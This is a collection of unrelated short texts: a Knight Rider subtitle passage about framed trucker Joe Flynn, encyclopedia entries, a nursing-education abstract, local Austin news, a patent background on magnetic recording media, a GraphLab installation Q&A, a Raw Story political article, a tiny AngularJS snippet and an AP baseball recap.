not the one wanted by the police." "You just became a burglar again." "Get off my property." "The longer Joe is on the run... the longer it's gonna take to get to the bottom of this." "Now, I'm telling you, I need to talk to your son." "Get out of here." "(KITT) That's an aggressively close-knit family, Michael." "That's why they know where Joe is." "Put a tap on their phone." "[beeping]" "So, what else does this car do besides look hot?" "Well, it's a lot more than a car." "(KITT) Thank you, Michael." "Voice modulator?" "That's great." "Will it give verbal response to major mathematical computations?" "Of course." "You gonna put my brother in jail?" "I said I was here to help." "You seem like an okay guy." "You know, you're a pretty bright girl." "(Michael) You got The Foundation's attention." "Cute, too." "You're teasing me." "That's what my brother always does." "I know I'm not pretty." "Yeah, you are." "(Mama Flynn) Flynn Trucking." "(Flynn) Hello, Mom." "It's Joe." "You're tapping our phone." "You're no friend." "You're a creep." "[car tires screeching]" "(Mama Flynn) Joey, you okay?" "(Flynn) I'm okay, Mom." "(Sally) Michael Knight had the phone tapped." "He's gonna know where Joey is." "Joey, get out of there." "A big guy in a black T-top is on his way to get you." "(Sally) Get going right now." "He's on his way." "(KITT) Sorry, Michael." "I know, partner, I know." "Look, backtrack that call and see if you can give me a location, will you?" "It's about a mile from here." "ETA, 40 seconds." "(KITT) Michael, there's Flynn's rig up ahead." "(Michael) Thanks, buddy." "[car tires screeching]" "We're going around him." "(KITT) You'll be cutting it close, Michael." "The road is too narrow." "We'll make it work for us." "[beeps] [car tires screeching]" "[exhales]" "Nice work, buddy." "Now just one more thing." "[car tires screeching]" "Michael, are you testing our courage, or my superstructure?" "[tires screeching]" "Would you like to know exactly... how close that truck is to us, Michael?" "Absolutely not." "Now, cool it." "If you wanted to kill me, you would've flattened me with the truck." "You from Shatner?" "No." "Not from Shatner or the police." "Now all I want is a little conversation." "(Flynn) Then why are you twisting my arm?" "'Cause I think you'd rather fight than talk." "All right, fair enough." "Let me go." "No more fighting." "I'm not gonna believe that." "Hey, I'm no liar and I'm no murderer." "All right. I'll deal with one thing at a time." "You'll have to deal with me first." "You just went from burglar to mugger." "Now, get your hands up and turn around." "Need a little diversion here, partner." "Of course, Michael." "[police siren wailing]" "This is the police." "You're surrounded." "All right." "I think we've had enough ambushes for one day, don't you?" "Oh, where are the police?" "(Sally) There are none, Mom." "It's that car of his." "It's something special." "It isn't special enough to take on three Flynns." "Enough!" "All you people do is fight?" "(Michael) So far all it's gotten you is a warrant for murder... and a license for Shatner to hunt you down." "Now, how about a little honest conversation for a change?" "Talk to me, Joe." "Look, I didn't cut Janetti's brakes. it's not my style." "Janetti pulled into the depot yard with full set of brakes." "When he pulled out, he was pumping air instead of brakes." "You were there at that depot when he was there." "I'm a trucker." "They have loads there." "You didn't have a load that day." "Come on, tell me the truth." "What were you doing there?" "I went to see Janetti." "I had to talk to him, had to apologize." "I shouldn't have hit him." "But I didn't kill him." "I'm innocent." "I don't know about that." "But I don't know you're guilty, either." "Who are you anyway?" "My name is Michael Knight." "I'm from The Foundation for Law and Government." "I've been sent here to make sure you're kept in a safe place... until I can get a handle on what's coming down here." ""Safe place." l think I know where that is." "All right, all I can say is you gotta trust me." "Doesn't look like I have much choice, does it?" "You do now." "Put this away." "All right, I'll go in with you." "Me, too." "No, stay here with Mom." "But I want to go." "I'll be all right." "(Sally) Pull over." "That's the car l'm looking for." "Thanks." "(KITT) Hold it, Sally." "The only thing you'll damage is your foot." "Shut up. I knew he was lying." "Nobody tells the truth." "You can't trust anything you don't program yourself." "Not true." "Who programmed you to argue?" "I don't argue, Sally, I merely correct improper calculations." "You can trust Michael Knight." "Yeah, says you." "He turned in my brother." "Now, listen, little girl." "I think I like you... but not if you won't keep an open mind when it comes to Michael." "He's a fair man." "What makes you so smart?" "I have computers that are pushed up to handle over two million K's." "What's your capabilities?" "Unlimited." "I now have over 50 million K's in storage... and can introduce one million more every day, if needed." "Tap into my equipment and we'll talk sometime." "Anytime, Sally." "But if you wait for Michael, I can arrange a guided tour... of my backup and design headquarters." "You expect me to be nice to him?" "Just be fair with him." "He'll help your brother if he can." "I don't know." "Sit down and relax, and we'll wait for Michael." "(Curtis) Relax, Mr. Shatner." "You'll just mess up your stomach again." "You're a rich man." "You've got nothing to worry about." "I didn't get rich by squandering my money or wasting my time... and I'm not about to let you do it for me." "And it doesn't cost me any more money... to get value for my dollar." "Like what?" "(Shatner) You are earning fat paychecks." "You got a $10,000 bonus for handling Janetti." "I want control of all trucking in this area." "I figured with Flynn out of the way there'd be nothing to stop us." "Don't figure, don't think, don't make decisions, and above all... don't tell me how to make a profit on my investments." "Now, you get out there... and make sure those independents... stay disorganized." "I don't want them even thinking they can pull together for the crop season." "I want that contract with Linden." "Finish Flynn's operation once and for all." "What are you waiting for?" "Car fare?" "Get back to your indie friends, so we know when and where to hit." "You're a Flynn, all right." "Now take it easy!" "You're a liar." "You turned in my brother." "I told him I'd keep him in a safe place... until I looked into this mess." "Now, he is safe." "In jail." "Don't con me." "You just wanted to see him arrested." "No, you're wrong." "Now, I'm not positive about anything yet... but if your brother is innocent and people are after these truckers... this could bring it out in the open." "I don't know anything about that stuff." "All I know is that you took Joe in and he was framed." "Sally, if your brother was framed, there are people who want to put him away real bad." "Now, if he's out there running loose like a wanted man... they have a license to kill him." "Joe is very safe in there." "Believe me." "Why don't you come with me?" "I want you to meet some other friends who want to help." "Come on." "(Michael) You might say that Bonnie is KlTT's mother." "She takes care of him... with all the maternal love and the ferocity of a tigress." "(Bonnie) Michael's kidding." "KlTT is his. I just put him back together again." "And Michael gives her a great many opportunities to do so." "Joey would love to see all of this." "He still doesn't have a lot of faith in computers or any of that technology... in spite of the fact that I.... in spite of what?" "Oh, nothing." "Excuse us." "Step into my office here." "You set everything up, right?" "Me?" "What?" "I checked the schedules and loading capacities... of the lndependent deliveries." "They were to the minute, and they were to the ounce." "You did that." "My brother Joe runs the family business." "Sure he does." "You can't tell anyone." "You have to promise not to." "I think it's something you should be proud of." "Yeah, right." "Try and convince a bunch of truckers... that a 15-year-old girl is running their schedule." "(Sally) Those guys listen to Joe, and they really look up to him." "Besides, he's the best." "I'm sure he is." "But, you know, you're not so bad yourself." "And you got him in jail." "We're going to lose everything we worked for." "We were counting on Joe to keep things going... until after we made the crop season." "Then we'd be home free." "Well, we're willing to do everything we can to help you." "You too?" "Of course." "Then give me Michael to drive the Flynn truck." "Wait a minute, I already got a job." "Hey, I'm talking to your boss." "I think it can be arranged." "Great." "All right, listen up." "You'll get union wages, profit participation, and supplemental health benefits." "(Sally) But you better be clear about one thing." "I think I know." "You're the boss." "You got it." "(Sally) Then you pick up at the train yards... for an intermediate drop at Armorbuilt." "Got it?" "Over." "I got it, Boss." "Say, does a lunch break enter into any of our schedules?" "Eat it on the move." "Out." "Out." "Hey, you hungry back there, partner?" "(KITT) Perhaps a little lonely, Michael... but rather enjoying my independence." "And if I may say so, that schedule that Sally laid out... is well planned and fiscally sound." "In fact, it's excellent." "Easy for you to say, you're not driving." "Yes, I am, Michael, and without union benefits." "Don't worry, you'll be on a coffee break in just a couple of minutes." "I'm stopping by the truck stop to see Mama Flynn." "What about your schedule?" "We'll work overtime." "Easy for you to say." "If you were on our side, you wouldn't have had Joey put in jail." "(Michael) He's gotta face that charge... or he's gonna end up running from the cops for the rest of his life." "We would've covered for him, kept the association going." "Now he didn't kill Janetti." "Then why don't you do something about both of those problems?" "That's just so much talk, man." "We're through as independents." "We might as well save our breath." "(men) Oh, yeah, yeah." "Come on, come on." "Come on, guys." "At least listen to him." "(man) What for?" "I've got more to lose than any of you... and I don't see anybody else rushing forward to do us any favors." "(Curtis) Oh, yeah?" "We're done, and so we might as well just forget it." "You're not done unless you're just looking for excuses to give up." "(Michael) The way I figure it, there's still a chance... of keeping this whole group together." "That is, if you guys really want to." "I'd be real careful with your words now, mister." "You're about one sentence away from insulting me." "It's about time I got you guys to listen." "We can pull this whole thing off with the produce delivery contract that Joe set up." "(Michael) We got enough people in this room... to meet the original date... and the full season delivery." "(Burgers) We've only got 24 hours." "Without Joe. lt's not worth it without him." "I'd just as soon repaint my rig with Shatner's colors." "He's right, big guy." "We could all end up like Joey." "Well, I think Joey is innocent." "Well, we all do." "So what?" "I think I know who did it." "What?" "(Burgers) Who?" "Well, that's gonna take a couple days to prove." "In the meantime, don't you think it would be nice... to keep the lndependent truckers alive while I'm at it?" "Be a nice present for Joey, once he gets out of jail, huh?" "[crowd agreeing]" "Hold it there." "Now we're gonna make that produce delivery... but you got some delivering to do yourself." "I intend to." "[radio beeps]" "(KITT) Michael, I think you did very well in there." "Well, thank you." "But there are other possible problems... one of which is you've replaced Joe Flynn as a target." "Yeah, I know." "I believe Joe's innocent, partner." "Based on what?" "Him, his family, his friends..." "Shatner's history." "Most of all, my instincts." "What do you think?" "I deal in facts, but I also trust your instincts." "Thank you." "(KITT) Michael, what is it?" "I can't get a reading." "KlTT, I'm blind!" "Micro jam the brakes!" "I can't or you'll fishtail." "I suggest you abandon." "If I bail out, we'll lose the rig." "And live to fight another day." "Michael, please." "I got the message." "[engine revving]" "[beeping]" "Now, Michael." "All right, micro jam the brakes. it's worth the gamble now." "[beeping]" "[brakes screeching]" "We were very lucky, Michael." "Lucky to have you, partner." "(Sally) The whole brake system is shot." "Downtime is rated at 4% of total working days." "You are out one day and you lose a complete rig." "It's gonna take weeks just to get the parts." "As of now, your overall safety record is rated as poor to uninsurable." "You're fired." "I'm fired?" "Look, I'm sorry about the truck." "The truck won't make any difference now that we've lost." "We can't make the produce run, and there's no way the guys will hang in now." "[door opening] [door closing]" "They gotta hang in there." "They don't like to give up." "Did you do what I asked?" "I've known those men for years." "Any of those men could be the man who framed Joe." "Curtis was the only one who left the meeting early... and he had time to put the bomb in your rig." "Well, well, well." "I've managed to stir things up." "You've managed to make yourself a target." "Don't worry about me." "I wanna do this for you and Sally." "I don't want her to lose any more." "She lost her father when she was two." "Any chance of growing up in frilly dresses by the time she was five... and now her brother, and her business by 15." "You're important to her." "I don't want her to lose you, too." "I don't plan on that, either." "You mind if I talk to her?" "Thanks." "Hold it." "Hold it!" "Get in the car." "Now we are going to talk." "You know what you get for stealing kids?" "I only borrowed you... and I got your mother's permission." "Okay, so you got me." "What are you going to do?" "Put me in a safe place... like you did my brother?" "I'm going to try and explain things to you once more." "Forget it. I'm not listening." "(Sally) You're a loser." "Sally." "You're a loser." "You got any suggestions, KlTT?" "(KITT) Children should be treated with great patience... reasoned with and educated so that they can be... brought slowly into maturity and a solid relationship with society." "I don't have all that much time." "Then I suggest a firm, but kindly spanking." "Oh, so you're going to beat me up just 'cause some computer tells you to?" "You. I thought you were my friend." "Spanking?" "You know, buddy, that's not a bad idea." "Wait." "Come here." "You're not really going to do it, are you?" "Of course I'm not." "You know, nobody but Joey ever spanked me." "And he was like you." "He only threatened." "Well, if he's a little bit like me, then maybe, just maybe... I'm a little bit like him." "Yeah." "You're a lot like him." "It's just...." "I don't know." "What?" "Hey, it's okay to be scared." "We're gonna lose the house and the truck, and there's not gonna be anything left." "It's not right." "And even you and that fancy Foundation can't help us." "I am gonna help." "I am gonna help." "You know why?" "Because I care about you." "I care about you, and I care about your mama... and I care about your brother, Joe." "Now, I'm betting everything that I can deliver for you." "All you've got to do is one simple little thing." "Trust me." "That's it." "How about it, cutie?" "That's my girl, that's my girl." "(Shatner) There is no Joe Flynn... or an independent organization for you to deal with, Linden." "Well, I still have an arrangement." "I have been dealing with the Flynn family for years... and I gave my word." "And they gave theirs." "They said they'd deliver and they can't." "You've got over 100 tons of produce in... every day starting tomorrow." "You truck with me or it'll sit in here and rot." "Can you afford that?" "You know I can't, Shatner." "That would put me and lot of farmers out of business." "Then you should sign for the season's crop now." "'Course, doing business with a reputable firm... it is a little more expensive." "About 15%." "I can't manage that much." "Then don't pay it." "The Independents will deliver your crop at the quoted price." "Who are you?" "For the sake of conversation, why don't you call me Flynn." "Flynn is finished." "You must be looking to join him." "Now, you tried that and you couldn't pull it off." "I'm here to confirm, Mr. Linden." "Mama Flynn said that you could deal for her... and I'd like to help." "But I represent a lot of people and I'm responsible to them." "You got the message, big boy." "Bye-bye." "Sign both-- What if I guarantee it?" "Guarantee it?" "Just how would you go about that?" "How about a completion bond?" "If you can put up a $50,000 bond by midnight... then you get the contract." "I'll put up a hundred." "Fifty is sufficient, Shatner." "I did have a deal with Flynn first." "If he meets the bond, then he's got it." "You know where to get in touch with me." "Thank you, sir." "And when they can't make it, you're gonna come back to talk to me." "Only it's gonna cost you 30% this time." "You might as well make it 50%... because you're never gonna have a chance to collect it." "Did we arrive in time?" "Just in time." "Now for phase two." "[beeping]" "Hey, what do you think you're doing?" "I was checking for smoke damage." "What's that supposed to mean?" "Figure it out yourself." "Yeah, I'll just do that." "As a matter of fact, I'll be waiting for you." "[car door closing] [car engine starting]" "I don't care what you have to do. I want those independents stopped." "They'll be in convoys." "It's gonna take a lot of men." "Then get them." "It's not just money now." "That guy's got it in for me." "He's not going to stop till he gets me." "All the better." "When you wreck that convoy, make sure he doesn't live through it." "(Devon) A $50,000 bond?" "Michael, you've got to be round the bend." "You want the truckers to go down without a chance?" "Joe Flynn to stay in jail?" "Of course not." "Mama Flynn and Sally?" "No." "And The Foundation to look like fools?" "Naturally not." "Look, we're all in this together." "What is a $50,000 bond among friends?" "All right, Michael. I have a couple of calls to make." "(Devon) By the way, how are you going to replace Flynn's truck?" "I've got an idea." "[people chattering]" "Devon, it's going to be all right." "But The Foundation mobile unit to haul produce?" "Really, Michael." "I don't know how you talked me into it." "Don't blame me, Devon." "You always told me... you'd never do anything you don't really want to do." "Well, that's the way I always felt, till now." "You'll get used to it." "By the way, what kind of produce is it?" "Onions." "Onions?" "Really, Michael." "Barring any accidents, the smell could last for months." "Well, if you whistle or put a pin in your mouth... I won't have to watch a grown man cry. I gotta go, Devon." "Yes, just as well." "Good luck, Michael." "Thanks, Devon." "(KITT) Michael, I've come to understand your humor... but don't you think you're being a little rough on Devon?" "No." "Thank you for your prompt answer." "Ready?" "All set." "I think you guys know this is Shatner and his group's last shot at us." "Let them come." "I think they will." "Keep moving." "Sure." "Stick together." "[truck horn blaring]" "(Shatner) Get the cement truck in position... and let's take them out." "[car tires screeching]" "I don't like this, partner." "Everything's going too smooth." "[beeping]" "(KITT) Well, then you'll be happy to hear... that I'm picking up a signal... from the homing device on the Curtis truck." "Great." "What's the location?" "(KITT) Moving towards the rear of the convoy." "There are two vehicles with it." "[car tires screeching]" "[truck horn blaring]" "[banging] [truck tires screeching]" "[car horn blaring]" "[truck horn blaring]" "Mom, watch out on your blind side." "What are you doing here?" "Yell at me later, just drive." "[car tires screeching]" "That's our man, let's get him." "(KITT) Wait, Michael, there's something up ahead." "There's a vehicle blocking the road and it contains 10 tons of broken concrete." "All right, give me what I need." "[beeping]" "(KITT) Michael, I said it contains 10 tons of concrete." "You're not going to...." "Not without you, partner." "[beeps]" "Shatner, you there?" "(Curtis) It's over, Shatner." "We can't stop them." "Finish them off." "You can catch them." "You do it. I'm done." "Let's get out of here." "(KITT) Which one do we want, Michael?" "Curtis." "The cops can pick up Shatner anytime." "That's Curtis off to the right." "All right, how do you suggest we take him?" "Gently, Michael." "Gently." "I hate making excuses to Bonnie." "She worries." "(Michael) All right, all right." "I'll do my best." "Okay, micro jam his brakes." "My pleasure, Michael." "[beeping] [truck tires screeching]" "Turbo boost, now!" "[brakes screeching]" "Hey, what are you hassling me for, man?" "You could've killed me." "Like you tried to kill the people in the convoy, huh?" "I don't know what you're talking about. I'm on my way to pick up a load." "You wanna see some pictures?" "KlTT, punch up the pictures of our friend here and the convoy." "Take a look." "(Michael) Now, zoom in on that one." "Hold it right there." "You see that picture?" "That picture and the homing device I planted in the truck... tie you up on this one." "Now, would you also like to see the pictures of you cutting Janetti's brakes?" "Wait a minute, hold on." "Can we talk?" "I mean, I'm not the one making the big score here, you know." "KlTT, hit the record button." "Ready, Michael." "All right, start talking and give him to me." "[beeps]" "[all chattering]" "(crowd) All right, Michael." "Thanks, man." "You got it." "Take care." "(woman) Geez, I think you look great." "All right." "(KITT) It's nice to have a family and friends to come back to." "We've got a family." "We got Devon, we got Bonnie." "I got you." "Thank you, Michael." "You know, you really are a good guy." "You know, that really means a lot to me." "I mean, we won the whole thing." "The Independent Association, Joey out of jail... everything's going to be just great." "Take care, little girl." "Could you lean down a little?" "I gotta go." "You know, Michael, we're going to miss her." "Yeah, if she was just... ten years older... and two feet taller." |
Mari El (; ; ), officially the Mari El Republic, is a republic of Russia. It is along the northern bank of the Volga River. In 2010, 696,459 people lived in the republic. Yoshkar-Ola is the capital and largest city.
Notes |
Teaching strategies and knowledge retention.
This project compared nurses' knowledge retention after completion of either a competency-based, written self-learning module or a competency-based, didactic lecture module. Using a pretest/posttest quasiexperimental design, a convenient sample was selected from a group of registered nurses who attended a mandatory yearly review of standards from the Joint Commission on Accreditation of Healthcare Organizations (JCAHO) and the Occupational Safety and Health Association (OSHA). The 67 subjects were given pretests, the same content material using the two types of presentations, and posttests. An analysis of covariance was used to determine posttest differences between the groups, controlling for pretest scores. Results indicated no significant differences among posttest scores of the treatment group and the control group; alpha level was 0.05. Knowledge retention essentially was the same, regardless of the antecedent teaching methodology. The advantages of one teaching method versus another may be in the flexibility afforded the staff educator. After desired outcomes are identified, a teaching method can be determined based on the staff educators' requirements, the resources available, and the learners' needs. |
Tadeusz Borowski (9 July 1941 - 4 March 2022) was a Polish actor. He was born in Warsaw, Poland. His career began in 1963. He was known for playing Eugeniusz Trushinsky in Remember Your Name (1974), Marian Rejewski in Sekret Enigmy (1979) and as Dr. Sanchez in Chopin: Desire for Love (2002).
Borowski died of natural causes in Warsaw on 4 March 2022, aged 80. |
The various folks dealing with the issue have yet to reveal the exact details that led to the hold-up in making the money available. But they are trying to change that now.
Austin Police officers are looking into the cause of a single-car crash this morning that tool the life of the driver and sent three others to the hospital. The crash happened just before 12:30 a.m. on the westbound frontage road of U.S.-290 near Harris Branch Parkway. The other passengers were taken to UMC Breckenridge with non-life-threatening injuries. Police cannot say yet if alcohol or speed were factors in the crash. This is Austin’s 85th traffic fatality this year.
It may not seem like it since we’ve heard so much about next year’s election, but today is Election Day. There are several statewide proposals to consider this time around. Among them is a proposal that would change the homestead exemption tax, and one that would exempt spouses of some disabled veterans from taxes. There will also be local elections on the ballot. Polls are open from 7am-7pm. |
Thomas Hardy OM (2 June 1840 - 11 January 1928) was an English novelist and poet. In the U.K. Hardy is generally thought to be one of the greatest figures in English literature. He lived in the Victorian era.
Early life
Thomas Hardy was born in Upper Bockhampton near Dorchester, Dorset. His father was a stonemason. His mother had read a lot. She added to his formal education. Hardy trained as an architect in Dorchester before moving to London to get a job. He won prizes from the Royal Institute of British Architects and the Architectural Association.
Career
Hardy wrote a small number of novels which earned him a high reputation in his lifetime. These include Tess of the d'Urbervilles, The Mayor of Casterbridge and Far from the Madding Crowd. After the publication of Jude the Obscure in 1895 Hardy gave up novel writing but continued to write poetry including an epic poem called The Dynasts. Hardy set his novels in South West England, calling it 'Wessex'. He invented names for the towns, e.g. "Casterbridge" is Dorchester in Dorset. Hardy died in Dorchester. His ashes are buried in Westminster Abbey. |
In recent years, magnetic recording and reproducing devices have been requested to attain more capacity and achieve higher performance due to increasing amount of information for personal computers and expanding applications to image recording apparatus, car navigation apparatus, and the like. For higher recording density, a smaller unit of magnetization reversal in magnetic recording media and media noise reduction are required. Conventional magnetic recording media have adopted a configuration that the ferromagnetic crystal grains comprising magnetic recording layers are preliminarily separated by nonmagnetic materials contained in magnetic recording layers.
To increase the magnetic recording density by active control of the separators, discrete track media in which recording tracks are separated, and further, bit patterned media in which recording bits are separated, have been researched and developed. The technique to form the separators has been a significant point for higher recording density in both of these media. For example, following techniques have been proposed to form the separators in discrete track media. One technique is the substrate processing type which preliminarily forms concentric lands and grooves on a substrate and forms a magnetic film thereon to form a patterned magnetic film. Another technique is the magnetic layer processing type which masks a magnetic film and etches the parts of a magnetic film to be grooves to form the pattern.
These techniques, however, include a plurality of processes such as backfilling nonmagnetic materials into the grooves, planarizing the surface so as to have the same level as the magnetic film to be the islands, and forming a protection film on the planarized surface. Consequently, other problems arise such as increase in foreign substances produced on the surfaces of the magnetic film and the protection film and increase in roughness of the surfaces. They prevent the reduction in the spacing between a magnetic head and a magnetic disk (nano-spacing), which is another point for higher recording density.
To overcome these problems, a method of forming separators by ion implantation has been attempted. For example, Japanese Patent Publication No. H5-205257 (“Patent Document 1”) discloses a method of forming separators between recording tracks of a discrete track medium by altering the magnetic property by means of nitrogen ion implantation into a magnetic layer, for example. According to Patent Document 1, this method can increase the track density without being significantly affected by the process accuracy to decrease the track width for a head. Japanese Patent Publication No. H9-167336 (“Patent Document 2”) attempted a method of forming servo patterns by ion implantation. According to Patent Document 2, the flatness of the surface can be much more improved.
Methods for separating recording tracks in discrete track media or recording bits in bit patterned media are important issues. In use of the methods in the above-listed documents, to improve the track density while preventing side writings onto recording tracks, forming separators across the magnetic layer in the film thickness direction is required. The forming separators require ion implantation of a nonmagnetic element across the magnetic layer in the film thickness direction at a sufficiently high acceleration voltage. In the meanwhile, if the acceleration voltage is raised, the thickness of a mask layer formed on the magnetic layer should be increased to prevent the recording tracks on the magnetic layer from being doped with nonmagnetic element ions. In this regard, if the thickness of the mask layer is increased, a problem arises that pattern collapse occur when the pattern pitch of the mask layer is narrowed for higher recording density. Therefore, the film thickness of the mask layer should be thinned so as to match the pattern pitch. However, if the film thickness is thinned and the acceleration voltage is high, the mask layer may not be able to sufficiently block the radiated ions and the recording tracks of the magnetic layer are doped with the nonmagnetic element ions. As a result, the magnetic property of the recording tracks is changed so that the read/write performance is disadvantageously deteriorated. In this case, it is necessary to lower the acceleration voltage in the ion implantation to reduce the implantation energy. However, if the implantation energy is reduced, separators may not be formed across the magnetic layer in the film thickness direction. If the structure of the magnetic layer is not appropriate, a magnetic flux induced by the magnetic layer remained undoped under the separators strays to the surface of separators to cause noise. Then, when the implantation energy is reduced, it is necessary to optimize the structure of the magnetic layer so as to match the implantation energy. |
The 2021 Copa America was the 47th edition of the Copa America, the international men's football championship organised by South America's CONMEBOL.
The tournament took place in Brazil from 13 June to 10 July 2021. The tournament was originally scheduled to take place from 12 June to 12 July 2020 in Argentina and Colombia as the 2020 Copa America. On 17 March 2020, CONMEBOL announced that because of the COVID-19 pandemic, the tournament had been postponed for a year.
Argentina won the tournament after defeating Brazil. |
Q:
GraphLab Create Installation Error - Python 3.5.2
I have been trying to install GraphLab Create on my system (64bit, Windows 10).
I used the Installation guide as given on the site https://turi.com/download/install-graphlab-create-command-line.html
I used the command line since I already had Anaconda3 installed in my system.
I tried the Method - 1 but it didn't work because I'm not using Python2.7, but Python3.5.2, so, I tried Method - 2 by using Virtual Environment.
I am getting a Syntax error when I try the command:
virtualenv gl-env
I have already installed Virtual Environment through pip so this should not happen, right ?
Please help me out on what could possibly be wrong.
A:
From the installation instructions page:
GraphLab Create installation requires a Python 2.7.x environment and pip version >= 7
You have to install GraphLab in a Python 2.7 environment, and not in a Python 3 one.
Thus, install python2 first and then follow the rest of the instructions:
conda create -n gl-env python=2.7 anaconda=4.0.0
|
Andreeva Bay is a bay in Murmansk Oblast, Russia. The bay is a radioactive waste repository (or a place to store things).
As of 2022, the cleaning up of nuclear waste is not complete; Russian authorities said in May 2022 that half of the nuclear waste has been cleaned up in the last 5 years.
History
The bay became a radioactive waste repository in 1961. The bay is 55 km (34 mi) northwest of Murmansk (city) and 60 km (37 mi) from the Norwegian border, on the western shore of the Zapadnaya Litsa (Kola Peninsula).
In February 1982, the Andreev Bay nuclear accident happened.
In 2022, NRK.no published a photo of a crane; The website says that the crane has removed half of the nuclear waste from the bay.
Sources
Geography of Russia
Bays |
According to the Southern Poverty Law Center (SPLC), South Carolina Lieutenant Governor — and incoming president of the College of Charleston — Glenn McConnell has made a career capitalizing on the legacy of the Confederacy.
In 2007, for example, he appeared on a white nationalist radio program — The Political Cesspool — that ranks among its guests former Grand Wizard of the Ku Klux Klan David Duke. The show’s mission statement states that it espouses “a philosophy that is pro-White” and is dedicated to “reviv[ing] the White birthrate above replacement level fertility and beyond to grow the percentage of Whites in the world relative to other races.”
On the program, Lt. Gov. McConnell spoke to host James Edwards about Confederate history and Southern heritage month. The interview begins with Edwards praising McConnell’s “distinct and distinguished Charleston accent.” They then begin to discuss the role of the National Association for the Advancement of Colored People (NAACP) in a 2001 debate about the flying of the Confederate flag.
“Nobody had a problem with it until all of a sudden, I believe it was in the 1980s, the NAACP discovered that they were offended by it,” McConnell said. “In the year of 2001, we agreed to remove the flag from the top of the capitol.”
McConnell claimed that he “had biracial and bipartisan support for that, and everybody was happy, but the NAACP,” but that for “all fair-minded people the controversy was resolved long ago, in the year 2001.”
“What you have is some people returning to the trough of controversy, they’re trying to feed on passions, they’re appealing to prejudice and they’re trying to inflame constituents and citizens across our state.”
“What’s sad about that,” he continued, “is that irresponsible grandstanding threatens to unravel the fabric of mutual respect and to divide our state for decades to come.”
“What we did is, we sealed our state together by mutual respect, and let me explain that: first we went to a soldier’s flag, so we could truly say that we respected the valor of the soldiers that left their homes and family to answer the call of the government,” he concluded.
“And most of them didn’t own slaves.”
He did not, however, indicate how the NAACP should have “mutually respected” the valor of those that did.
Listen to audio from Lt. Gov. McConnell’s appearance on The Political Cesspool via the SPLC below.
About the Author
Scott Eric Kaufman is the proprietor of the AV Club's Internet Film School and, in addition to Raw Story, also writes for Lawyers, Guns & Money. He earned a Ph.D. in English Literature from the University of California, Irvine in 2008. |
The term Program can be used in many ways.
A program or programme can be a plan of how to do something. It tells the steps that we think we need to do to make something happen. For example, a government might make a program to improve the health of the people in part of a country by giving the people better food, by helping to kill insects that carry diseases, and by bringing more doctors.
A computer program is a set of computer instructions. A set of computer instructions is called Program and a set of program is called software. All software must have these three parts.
Television program(me) is a show that is on television.
Radio program is similar to a television program but it is on the radio.
Webcast is similar to a television program but it is shown on the Internet.
12-step program is a way people use to stop doing something. Examples would be to stop drinking alcohol, stop smoking tobacco or stop using drugs.
an event program is a thing that lists the what will happen during an event such as an opera or auction. |
(function() {
'use strict';
angular.module('journalism_workflow.v1.copy_editor', []);
})();
|
Carlton is the county seat of Carlton County, Minnesota, United States.
Cities in Minnesota
County seats in Minnesota |
San Francisco Giants pitcher Madison Bumgarner prepares to deliver a pitch against the Atlanta Braves in the first inning at AT&T Park. / Cary Edmondson, USA TODAY Sports
by USA TODAY
by USA TODAY
SAN FRANCISCO (AP) - Madison Bumgarner didn't take any personal satisfaction from his first career victory over the Atlanta Braves.
There's no doubt what it meant to his team.
Bumgarner struck out a season-high 11 over seven innings, Gregor Blanco entered in the fifth as a pinch hitter and drove in four runs, and the San Francisco Giants routed the Atlanta Braves 10-1 Saturday.
The North Carolina native grew up rooting for the Braves and had been winless against them in four previous starts. Bumgarner (4-1) gave up just four hits and walked two, winning for the first time since April 13.
"They've got as good a shot as anybody to play October baseball," Bumgarner said of the Braves. "When you play a team like that, you want to play your best baseball, too."
Blanco had a three-run double and triple in setting a career high for RBI.
San Francisco's rotation, considered one of the best in the majors, has struggled early this season. But ace Matt Cain tossed eight innings of three-hit ball in Friday's win, and coupled with Bumgarner's effort, the Giants can claim the four-game series with a victory in Sunday's finale.
It was a frustrating day for the National League East-leading Braves. Dan Uggla struck out four times and Chris Johnson went down swinging three times. After a victory in Thursday's opener, the Braves have mustered just 10 hits and been outscored 18-3.
"He's nasty," Johnson said. "For me, he is one of the best lefties in the game. He throws his cutter in to righties. He makes righties feel uneasy."
They hurt themselves defensively Saturday, and lefty Paul Maholm (4-4) lasted just 4 1/3 innings and was charged with six runs on eight hits.
The Giants led 2-1 when they broke the game open with a four-run fifth, aided by the adventures of Braves right fielder Justin Upton.
Upton let Marco Scutaro's liner skip past him for a one-out triple. After Pablo Sandoval was hit by a pitch, Buster Posey drove an RBI double deep to right that Upton made an awkward attempt on as it bounced up against the wall. Hunter Pence was intentionally walked to load the bases, and Braves interim manager Carlos Tosca called on Cory Gearrin to relieve Maholm.
Giants manager Bruce Bochy sent up Blanco to hit for Francisco Peguero, and Blanco delivered a three-run double to right-center that extended the Giants' lead to 6-1.
"It is definitely a difficult outfield," Upton said. "You definitely have to make a decision pre-pitch on how aggressive you want to be."
Blanco was at it again in the eighth, when the Giants batted around and tacked on four more. His liner to left field skipped past a charging Evan Gattis and went for an RBI triple. Blanco is 9-for-19 this season with runners in scoring position.
San Francisco's starting pitchers entered the day with a 4.48 ERA, which ranked 13th out of 15 NL teams. Bumgarner rebounded after his worst outing of the season, when he gave up five runs in six innings against Philadelphia on Monday.
"That's a tough lineup to go through and he did quite a job for us," Bochy said.
Johnson, the Braves third baseman, struck out swinging in all three at-bats against Bumgarner.
"He's nasty," Johnson said. "For me, he is one of the best lefties in the game. He throws his cutter in to righties. He makes righties feel uneasy."
Sandoval's homer in the first gave the Giants an early lead. Brandon Crawford doubled in a run in the fourth to make it 2-0, one of two hits the left-handed hitting Crawford had off Maholm.
Maholm entered Saturday having yielded just four hits to lefties all season.
NOTES: Giants reliever Santiago Casilla was scheduled to run during batting practice to test his sore right knee, but Bochy wasn't planning on having Casilla available until Tuesday's road trip opener at Toronto. ... Tim Lincecum, who starts Sunday for San Francisco, has lost his last four starts against Atlanta. Kris Medlen will take the ball for the Braves, looking to snap a five-start winless streak. ... Scutaro has an 11-game hitting streak. ... Johnson is 0 for 17 with eight strikeouts this month.
Copyright 2015 The Associated Press. All
rights reserved. This material may not be published, broadcast, rewritten or redistributed. |
Intellectual disability is a condition of the brain. People suffering from it are not as smart as the average person of their age group; because of this, they often have trouble with getting through daily life, without the help of others. The condition is also known as intellectual developmental disability, or general learning disability. It used to be called mental retardation but that term is not used very much any more. It is classified as a learning disability. Intellectual disability becomes apparent in childhood. There are a number of conditions that show as intelectual disability.
There are two main forms: In one form, the disability occurs together with other healh issues (or syndromes), in the other it occurs on its own.
